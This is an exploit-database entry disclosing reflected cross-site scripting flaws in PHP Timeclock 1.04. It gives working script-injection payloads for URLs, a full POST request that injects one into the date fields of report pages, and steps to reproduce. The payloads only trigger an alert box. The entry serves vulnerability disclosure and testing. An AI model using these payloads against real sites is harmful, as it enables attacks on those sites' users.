Exploit for PHP Timeclock 1.04 Cross Site Scripting

Name: Exploit for PHP Timeclock 1.04 Cross Site Scripting
Rating: 5 (172 reviews)
2021-05-08 | CVSS -0.0
## https://sploitus.com/exploit?id=PACKETSTORM:162511
# Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)  
# Date: May 3rd 2021  
# Exploit Author: Tyler Butler  
# Vendor Homepage: http://timeclock.sourceforge.net  
# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/  
# Version: 1.04  
# Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5  
  
Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities  
  
#1: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application by appending a termination /'> and payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php (2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php.   
  
  
Payload: /'><svg/onload=alert`xss`>  
  
Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E  
ß  
  
Steps to reproduce:  
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier  
2. Make a GET request to one of the four resources mentioned above  
3. Append /'> and the payload to the end of the request  
4. Submit the request and observe payload execution  
  
  
#2: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters.  
  
# Example:   
  
POST /reports/audit.php HTTP/1.1  
Host: localhost  
Content-Length: 98  
Cache-Control: max-age=0  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"  
sec-ch-ua-mobile: ?0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/reports/audit.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo  
Connection: close  
  
date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5  
  
  
Payload: '><svg/onload=alert`xss`>  
  
  
Steps to reproduce:  
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier  
2. Create a report at one of the vulnerable directories noted above  
3. Intercept the request with a proxy tool like BurpSuite  
4. Inject payload into the from_date or to_date fields